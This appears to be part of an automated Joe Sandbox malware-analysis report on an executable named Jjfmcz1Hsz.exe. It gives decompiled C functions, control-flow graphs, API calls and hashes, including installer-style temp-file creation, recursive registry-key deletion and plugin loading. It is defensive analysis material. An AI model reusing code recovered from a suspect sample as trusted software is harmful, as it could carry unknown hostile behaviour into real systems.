                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsl1543.tmp
                                                                                                                                                                            • API String ID: 1356686001-180426900
                                                                                                                                                                            • Opcode ID: 2aeca9d40c2f44e41a3d2ec26537502cd5dfdc14477a75349ca227dcf68636c1
                                                                                                                                                                            • Instruction ID: 26fcae0a7b2a502e926faea7c6e927eea7b3aae3134fdb689c9e3a18d41500d2
                                                                                                                                                                            • Opcode Fuzzy Hash: 2aeca9d40c2f44e41a3d2ec26537502cd5dfdc14477a75349ca227dcf68636c1
                                                                                                                                                                            • Instruction Fuzzy Hash: 3E1145B1E00108BFEB10AFA5EE89EAF767DEB54358F10403AF505B71D1D6B85D419B28
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 994 40599b-4059a5 995 4059a6-4059d1 GetTickCount GetTempFileNameA 994->995 996 4059e0-4059e2 995->996 997 4059d3-4059d5 995->997 999 4059da-4059dd 996->999 997->995 998 4059d7 997->998 998->999
                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E0040599B(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                                                                                            				char _t11;
                                                                                                                                                                            				signed int _t12;
                                                                                                                                                                            				int _t15;
                                                                                                                                                                            				signed int _t17;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				CHAR* _t21;
                                                                                                                                                                            
                                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                                            				_t20 = 0x64;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t11 =  *0x4093ac; // 0x61736e
                                                                                                                                                                            					_t20 = _t20 - 1;
                                                                                                                                                                            					_a4 = _t11;
                                                                                                                                                                            					_t12 = GetTickCount();
                                                                                                                                                                            					_t17 = 0x1a;
                                                                                                                                                                            					_a6 = _a6 + _t12 % _t17;
                                                                                                                                                                            					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                                                                                                            					if(_t15 != 0) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *_t21 =  *_t21 & 0x00000000;
                                                                                                                                                                            					return _t15;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t21;
                                                                                                                                                                            			}









                                                                                                                                                                            0x0040599f
                                                                                                                                                                            0x004059a5
                                                                                                                                                                            0x004059a6
                                                                                                                                                                            0x004059a6
                                                                                                                                                                            0x004059ab
                                                                                                                                                                            0x004059ac
                                                                                                                                                                            0x004059af
                                                                                                                                                                            0x004059b9
                                                                                                                                                                            0x004059c6
                                                                                                                                                                            0x004059c9
                                                                                                                                                                            0x004059d1
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004059d5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004059d7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x004059d7
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 004059AF
                                                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059C9
                                                                                                                                                                            Strings
                                                                                                                                                                            • "C:\Users\user\Desktop\Jjfmcz1Hsz.exe", xrefs: 0040599B
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                                                                                                                                            • nsa, xrefs: 004059A6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                            • API String ID: 1716503409-2734141434
                                                                                                                                                                            • Opcode ID: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                            • Instruction ID: 3a3981258a6ccd3f3c7180c2fb01dffc681fdc90015df490a153c8b64b3610b8
                                                                                                                                                                            • Opcode Fuzzy Hash: a71f6d19a672690ae76045f6a92713abfaab32ef542e638d1cc3651a1fbf987a
                                                                                                                                                                            • Instruction Fuzzy Hash: 6DF08276708214ABEB108F55EC04B9B7B9CDF91760F10C03BFA48DA190D6B599548B99
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1000 402a7a-402aa3 RegOpenKeyExA 1001 402aa5-402ab0 1000->1001 1002 402b0e-402b12 1000->1002 1003 402acb-402adb RegEnumKeyA 1001->1003 1004 402ab2-402ab5 1003->1004 1005 402add-402aef RegCloseKey call 406092 1003->1005 1006 402b02-402b05 RegCloseKey 1004->1006 1007 402ab7-402ac9 call 402a7a 1004->1007 1013 402af1-402b00 1005->1013 1014 402b15-402b1b 1005->1014 1009 402b0b-402b0d 1006->1009 1007->1003 1007->1005 1009->1002 1013->1002 1014->1009 1015 402b1d-402b2b RegDeleteKeyA 1014->1015 1015->1009 1016 402b2d 1015->1016 1016->1002
                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E00402A7A(void* _a4, char* _a8, intOrPtr _a12) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				char _v272;
                                                                                                                                                                            				long _t18;
                                                                                                                                                                            				intOrPtr* _t27;
                                                                                                                                                                            				long _t28;
                                                                                                                                                                            
                                                                                                                                                                            				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x4237b0 | 0x00000008,  &_v8); // executed
                                                                                                                                                                            				if(_t18 == 0) {
                                                                                                                                                                            					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                            							RegCloseKey(_v8);
                                                                                                                                                                            							L8:
                                                                                                                                                                            							return 1;
                                                                                                                                                                            						}
                                                                                                                                                                            						if(E00402A7A(_v8,  &_v272, 0) != 0) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					RegCloseKey(_v8);
                                                                                                                                                                            					_t27 = E00406092(3);
                                                                                                                                                                            					if(_t27 == 0) {
                                                                                                                                                                            						if( *0x4237b0 != 0) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t28 = RegDeleteKeyA(_a4, _a8);
                                                                                                                                                                            						if(_t28 != 0) {
                                                                                                                                                                            							goto L8;
                                                                                                                                                                            						}
                                                                                                                                                                            						return _t28;
                                                                                                                                                                            					}
                                                                                                                                                                            					return  *_t27(_a4, _a8,  *0x4237b0, 0);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t18;
                                                                                                                                                                            			}








                                                                                                                                                                            0x00402a9b
                                                                                                                                                                            0x00402aa3
                                                                                                                                                                            0x00402acb
                                                                                                                                                                            0x00402ab5
                                                                                                                                                                            0x00402b05
                                                                                                                                                                            0x00402b0b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402b0d
                                                                                                                                                                            0x00402ac9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402ac9
                                                                                                                                                                            0x00402ae0
                                                                                                                                                                            0x00402ae8
                                                                                                                                                                            0x00402aef
                                                                                                                                                                            0x00402b1b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402b23
                                                                                                                                                                            0x00402b2b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402b2b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00402afe
                                                                                                                                                                            0x00402b12

                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A9B
                                                                                                                                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                                                                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                            • Opcode ID: ae09a9da48d779165f4d820b178e7b78ee37b087aa05fe1e09047ef6d5127422
                                                                                                                                                                            • Instruction ID: feb6aed171ad8b85e204e5b4e2feb4536d295dbd67c3687bd8867431d3a466b7
                                                                                                                                                                            • Opcode Fuzzy Hash: ae09a9da48d779165f4d820b178e7b78ee37b087aa05fe1e09047ef6d5127422
                                                                                                                                                                            • Instruction Fuzzy Hash: 53117F71A00108FFDF229F90DE89EAE3B7DEB54349B104076FA01B10A0D7749E51DB69
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1018 100016bd-100016f9 call 10001a5d 1022 1000180a-1000180c 1018->1022 1023 100016ff-10001703 1018->1023 1024 10001705-1000170b call 100021b0 1023->1024 1025 1000170c-10001719 call 100021fa 1023->1025 1024->1025 1030 10001749-10001750 1025->1030 1031 1000171b-10001720 1025->1031 1034 10001770-10001774 1030->1034 1035 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 1030->1035 1032 10001722-10001723 1031->1032 1033 1000173b-1000173e 1031->1033 1037 10001725-10001726 1032->1037 1038 1000172b-1000172c call 100027e8 1032->1038 1033->1030 1041 10001740-10001741 call 10002aa3 1033->1041 1039 100017b2-100017b8 call 100023da 1034->1039 1040 10001776-100017b0 call 10001559 call 100023da 1034->1040 1059 100017b9-100017bd 1035->1059 1043 10001733-10001739 call 10002589 1037->1043 1044 10001728-10001729 1037->1044 1050 10001731 1038->1050 1039->1059 1040->1059 1053 10001746 1041->1053 1058 10001748 1043->1058 1044->1030 1044->1038 1050->1053 1053->1058 1058->1030 1060 100017fa-10001801 1059->1060 1061 100017bf-100017cd call 100023a0 1059->1061 1060->1022 1066 10001803-10001804 GlobalFree 1060->1066 1068 100017e5-100017ec 1061->1068 1069 100017cf-100017d2 1061->1069 1066->1022 1068->1060 1071 100017ee-100017f9 call 100014e2 1068->1071 1069->1068 1070 100017d4-100017dc 1069->1070 1070->1068 1072 100017de-100017df FreeLibrary 1070->1072 1071->1060 1072->1068
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E100016BD(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                                            				void _v36;
                                                                                                                                                                            				struct HINSTANCE__* _t34;
                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				void* _t46;
                                                                                                                                                                            				void* _t50;
                                                                                                                                                                            				intOrPtr _t53;
                                                                                                                                                                            				signed int _t57;
                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            				void* _t74;
                                                                                                                                                                            
                                                                                                                                                                            				_t74 = __esi;
                                                                                                                                                                            				_t66 = __edi;
                                                                                                                                                                            				_t65 = __edx;
                                                                                                                                                                            				 *0x1000405c = _a8;
                                                                                                                                                                            				 *0x10004060 = _a16;
                                                                                                                                                                            				 *0x10004064 = _a12;
                                                                                                                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E10001556);
                                                                                                                                                                            				_push(1); // executed
                                                                                                                                                                            				_t34 = E10001A5D(); // executed
                                                                                                                                                                            				_t50 = _t34;
                                                                                                                                                                            				if(_t50 == 0) {
                                                                                                                                                                            					L28:
                                                                                                                                                                            					return _t34;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                                                                                            						E100021B0(_t50);
                                                                                                                                                                            					}
                                                                                                                                                                            					E100021FA(_t65, _t50);
                                                                                                                                                                            					_t53 =  *((intOrPtr*)(_t50 + 4));
                                                                                                                                                                            					if(_t53 == 0xffffffff) {
                                                                                                                                                                            						L14:
                                                                                                                                                                            						if(( *(_t50 + 0x810) & 0x00000004) == 0) {
                                                                                                                                                                            							if( *((intOrPtr*)(_t50 + 4)) == 0) {
                                                                                                                                                                            								_t34 = E100023DA(_t50);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_push(_t74);
                                                                                                                                                                            								_push(_t66);
                                                                                                                                                                            								_t12 = _t50 + 0x818; // 0x818
                                                                                                                                                                            								_t57 = 8;
                                                                                                                                                                            								memcpy( &_v36, _t12, _t57 << 2);
                                                                                                                                                                            								_t38 = E10001559(_t50);
                                                                                                                                                                            								_t15 = _t50 + 0x818; // 0x818
                                                                                                                                                                            								_t70 = _t15;
                                                                                                                                                                            								 *((intOrPtr*)(_t50 + 0x820)) = _t38;
                                                                                                                                                                            								 *_t70 = 3;
                                                                                                                                                                            								E100023DA(_t50);
                                                                                                                                                                            								_t61 = 8;
                                                                                                                                                                            								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E100023DA(_t50);
                                                                                                                                                                            							_t34 = GlobalFree(E10001266(E10001559(_t50)));
                                                                                                                                                                            						}
                                                                                                                                                                            						if( *((intOrPtr*)(_t50 + 4)) != 1) {
                                                                                                                                                                            							_t34 = E100023A0(_t50);
                                                                                                                                                                            							if(( *(_t50 + 0x810) & 0x00000040) != 0 &&  *_t50 == 1) {
                                                                                                                                                                            								_t34 =  *(_t50 + 0x808);
                                                                                                                                                                            								if(_t34 != 0) {
                                                                                                                                                                            									_t34 = FreeLibrary(_t34);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							if(( *(_t50 + 0x810) & 0x00000020) != 0) {
                                                                                                                                                                            								_t34 = E100014E2( *0x10004058);
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						if(( *(_t50 + 0x810) & 0x00000002) != 0) {
                                                                                                                                                                            							goto L28;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return GlobalFree(_t50);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t44 =  *_t50;
                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                            						if(_t53 != 1) {
                                                                                                                                                                            							goto L14;
                                                                                                                                                                            						}
                                                                                                                                                                            						E10002AA3(_t50);
                                                                                                                                                                            						L12:
                                                                                                                                                                            						_t50 = _t44;
                                                                                                                                                                            						L13:
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t45 = _t44 - 1;
                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                            						L8:
                                                                                                                                                                            						_t44 = E100027E8(_t53, _t50); // executed
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t46 = _t45 - 1;
                                                                                                                                                                            					if(_t46 == 0) {
                                                                                                                                                                            						E10002589(_t50);
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t46 != 1) {
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L8;
                                                                                                                                                                            				}
                                                                                                                                                                            			}

















                                                                                                                                                                            0x100016bd
                                                                                                                                                                            0x100016bd
                                                                                                                                                                            0x100016bd
                                                                                                                                                                            0x100016c7
                                                                                                                                                                            0x100016cf
                                                                                                                                                                            0x100016dc
                                                                                                                                                                            0x100016ea
                                                                                                                                                                            0x100016ed
                                                                                                                                                                            0x100016ef
                                                                                                                                                                            0x100016f4
                                                                                                                                                                            0x100016f9
                                                                                                                                                                            0x1000180c
                                                                                                                                                                            0x1000180c
                                                                                                                                                                            0x100016ff
                                                                                                                                                                            0x10001703
                                                                                                                                                                            0x10001706
                                                                                                                                                                            0x1000170b
                                                                                                                                                                            0x1000170d
                                                                                                                                                                            0x10001713
                                                                                                                                                                            0x10001719
                                                                                                                                                                            0x10001749
                                                                                                                                                                            0x10001750
                                                                                                                                                                            0x10001774
                                                                                                                                                                            0x100017b3
                                                                                                                                                                            0x10001776
                                                                                                                                                                            0x10001776
                                                                                                                                                                            0x10001777
                                                                                                                                                                            0x1000177a
                                                                                                                                                                            0x10001780
                                                                                                                                                                            0x10001784
                                                                                                                                                                            0x10001787
                                                                                                                                                                            0x1000178c
                                                                                                                                                                            0x1000178c
                                                                                                                                                                            0x10001793
                                                                                                                                                                            0x10001799
                                                                                                                                                                            0x1000179f
                                                                                                                                                                            0x100017ab
                                                                                                                                                                            0x100017ac
                                                                                                                                                                            0x100017af
                                                                                                                                                                            0x10001752
                                                                                                                                                                            0x10001753
                                                                                                                                                                            0x10001768
                                                                                                                                                                            0x10001768
                                                                                                                                                                            0x100017bd
                                                                                                                                                                            0x100017c0
                                                                                                                                                                            0x100017cd
                                                                                                                                                                            0x100017d4
                                                                                                                                                                            0x100017dc
                                                                                                                                                                            0x100017df
                                                                                                                                                                            0x100017df
                                                                                                                                                                            0x100017dc
                                                                                                                                                                            0x100017ec
                                                                                                                                                                            0x100017f4
                                                                                                                                                                            0x100017f9
                                                                                                                                                                            0x100017ec
                                                                                                                                                                            0x10001801
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001803
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001804
                                                                                                                                                                            0x10001801
                                                                                                                                                                            0x1000171d
                                                                                                                                                                            0x10001720
                                                                                                                                                                            0x1000173e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001741
                                                                                                                                                                            0x10001746
                                                                                                                                                                            0x10001746
                                                                                                                                                                            0x10001748
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001748
                                                                                                                                                                            0x10001722
                                                                                                                                                                            0x10001723
                                                                                                                                                                            0x1000172b
                                                                                                                                                                            0x1000172c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000172c
                                                                                                                                                                            0x10001725
                                                                                                                                                                            0x10001726
                                                                                                                                                                            0x10001734
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001734
                                                                                                                                                                            0x10001729
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10001729

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                                                                                                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                                                                                                                                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001768
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 100017DF
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                              • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                                                                                                                                                              • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                                                                                                                                                              • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1791698881-3916222277
                                                                                                                                                                            • Opcode ID: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                            • Instruction ID: 7bd52774c71d274dd6e07030a7ef65efb9a892d3f5f2eddd47f658e3267813e4
                                                                                                                                                                            • Opcode Fuzzy Hash: ee4c9fc9ebc314f30cf8369a5322713cb2bdaef71cd7754c4cd252d6b1501433
                                                                                                                                                                            • Instruction Fuzzy Hash: B5319C79408205DAFB41DF649CC5BCA37ECFF042D5F018465FA0A9A09EDF78A8858B60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 51%
                                                                                                                                                                            			E00401BCA() {
                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                            				CHAR* _t31;
                                                                                                                                                                            				long _t32;
                                                                                                                                                                            				int _t37;
                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                            				int _t42;
                                                                                                                                                                            				int _t48;
                                                                                                                                                                            				struct HWND__* _t52;
                                                                                                                                                                            				void* _t55;
                                                                                                                                                                            
                                                                                                                                                                            				 *(_t55 - 8) = E00402A1D(3);
                                                                                                                                                                            				 *(_t55 + 8) = E00402A1D(4);
                                                                                                                                                                            				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                                                                                                                                            					 *((intOrPtr*)(__ebp - 8)) = E00402A3A(0x33);
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                                                                                                                                            				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                                                                                                                                            					 *(_t55 + 8) = E00402A3A(0x44);
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                                                                                                                                            				_push(1);
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_t50 = E00402A3A();
                                                                                                                                                                            					_t28 = E00402A3A();
                                                                                                                                                                            					asm("sbb ecx, ecx");
                                                                                                                                                                            					asm("sbb eax, eax");
                                                                                                                                                                            					_t31 =  ~( *_t27) & _t50;
                                                                                                                                                                            					__eflags = _t31;
                                                                                                                                                                            					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28); // executed
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t52 = E00402A1D();
                                                                                                                                                                            					_t37 = E00402A1D();
                                                                                                                                                                            					_t48 =  *(_t55 - 0x14) >> 2;
                                                                                                                                                                            					if(__eflags == 0) {
                                                                                                                                                                            						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                                                                                                                                            						L10:
                                                                                                                                                                            						 *(_t55 - 0xc) = _t32;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                                                                                                                                            						asm("sbb eax, eax");
                                                                                                                                                                            						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                                                                                                                                            				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                                                                                                                                            					_push( *(_t55 - 0xc));
                                                                                                                                                                            					E00405C57();
                                                                                                                                                                            				}
                                                                                                                                                                            				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t55 - 4));
                                                                                                                                                                            				return 0;
                                                                                                                                                                            			}












                                                                                                                                                                            0x00401bd3
                                                                                                                                                                            0x00401bdf
                                                                                                                                                                            0x00401be2
                                                                                                                                                                            0x00401beb
                                                                                                                                                                            0x00401beb
                                                                                                                                                                            0x00401bee
                                                                                                                                                                            0x00401bf2
                                                                                                                                                                            0x00401bfb
                                                                                                                                                                            0x00401bfb
                                                                                                                                                                            0x00401bfe
                                                                                                                                                                            0x00401c02
                                                                                                                                                                            0x00401c04
                                                                                                                                                                            0x00401c51
                                                                                                                                                                            0x00401c53
                                                                                                                                                                            0x00401c5c
                                                                                                                                                                            0x00401c64
                                                                                                                                                                            0x00401c67
                                                                                                                                                                            0x00401c67
                                                                                                                                                                            0x00401c70
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00401c06
                                                                                                                                                                            0x00401c0d
                                                                                                                                                                            0x00401c0f
                                                                                                                                                                            0x00401c17
                                                                                                                                                                            0x00401c1a
                                                                                                                                                                            0x00401c42
                                                                                                                                                                            0x00401c76
                                                                                                                                                                            0x00401c76
                                                                                                                                                                            0x00401c1c
                                                                                                                                                                            0x00401c2a
                                                                                                                                                                            0x00401c32
                                                                                                                                                                            0x00401c35
                                                                                                                                                                            0x00401c35
                                                                                                                                                                            0x00401c1a
                                                                                                                                                                            0x00401c79
                                                                                                                                                                            0x00401c7c
                                                                                                                                                                            0x00401c82
                                                                                                                                                                            0x00402877
                                                                                                                                                                            0x00402877
                                                                                                                                                                            0x004028d2
                                                                                                                                                                            0x004028de

                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
